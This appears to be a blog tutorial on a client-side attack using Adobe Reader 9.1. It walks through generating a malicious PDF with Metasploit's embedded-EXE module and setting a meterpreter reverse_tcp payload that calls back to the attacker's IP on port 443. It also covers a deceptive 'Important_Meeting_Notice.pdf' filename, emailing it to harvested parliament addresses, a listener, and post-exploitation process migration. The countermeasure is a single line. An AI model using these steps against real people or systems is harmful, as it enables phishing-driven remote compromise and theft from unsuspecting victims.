Client Side Attack Using Adobe PDF Escape EXE Social Engineering

Type : Tutorial

Level : Medium, Hard

Testing Platform : Win XP SP3, Windows 7

Vulnerable Application Testing : Adobe Reader 9.1

There are some people says that the weakest security to breach was the human itself. I didn't say it was WRONG, because in fact yes it was the weakest, but I also cannot say TRUE, because sometimes the human didn't know what they are doing because no one told them before 🙂 .

In this tutorial I will give a demonstration how to attack client side using Adobe PDF Escape EXE vulnerability. Almost 95%(maybe) Windows users have Adobe Acrobat (Acrobat Reader) application in their computer or laptops.

If you watching or reading news a few weeks ago about Australia parliament computer has compromised by unknown hacker, actually the hacker do some social engineering technique to gain a privilege to Australian parliament computer and it was almost the same method use in this tutorial.

Okay, here's the scenario of this attack method :

1. The parliament have an email address let's says (parliament@vishnuvalentino.com) — usually this type of people (maybe about 80%) only know how to use computer without knowing the risk about it… if there's any problem, they will call IT support to fix the mess 🙂 .

In this scenario, the attacker(Me) will attack using Computer Based Social Engineering. After a few times visiting facebook, Google, and also dumpster diving around the parliament office finally this attacker collecting a few parliament e-mail address lists.

Requirement :

1. Metasploit Framework

2. Windows or Linux OS(I'm using Backtrack 5 in this tutorial)

Step By Step Client Side Attack Using Adobe PDF Escape EXE Social Engineering:

1. The first step, I will create a malicious PDF to use in this attack by using vulnerability in Adobe Reader : Adobe PDF Escape Exe Social Engineering No Javascript.

Legends:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Use adobe pdf embedded exe exploit

set payload windows/meterpreter/reverse_tcp --> Set the payload to return meterpreter script when exploit successfully performed

set filename Important_Meeting_Notice.pdf --> Make this file as interesting as you can so the victim will open your malicious PDF

set lhost 192.168.8.92 --> Attacker IP address(change with your IP)

set lport 443 --> I'm using this port to prevent victim proxy blocked the traffic(443 is always open :p )

exploit --> generate the malicious PDF

After we successfully generate the malicious PDF, it will stored on your local computer. I've highlight it using yellow marker, check the directory containing malicious PDF file.

2. The next step is sending our malicious code to target e-mail. In this case I will send it to parliament@vishnuvalentino.com (see our scenario if you still asking why).

3. After sending our malicious PDF files, we need to set up a listener to capture this reverse connection. We will use msfconsole to set up our multi handler listener.

4. The victim(parliament@vishnuvalentino.com) opened the e-mail and then scan using their antivirus.

Antivirus find nothing.

5. After the victim open our malicious PDF file there's an alert box guide victim to tick the "do not show this message again" and click open.

6. After the victim click open button, our listener start capture reverse connection.

Yep we're in! 🙂

Notes :

– After successfully perform this attack, try to migrate process to Explorer.exe (see tutorial here on step 2 and 3).

Countermeasure :

1. When you open some files and there's an aleart appears, read the alert carefully. Sometimes when you click "Next" or "OK" when alert appears is not a good idea 😛

Hope you enjoyed it! 🙂

Share this article if you found it was useful: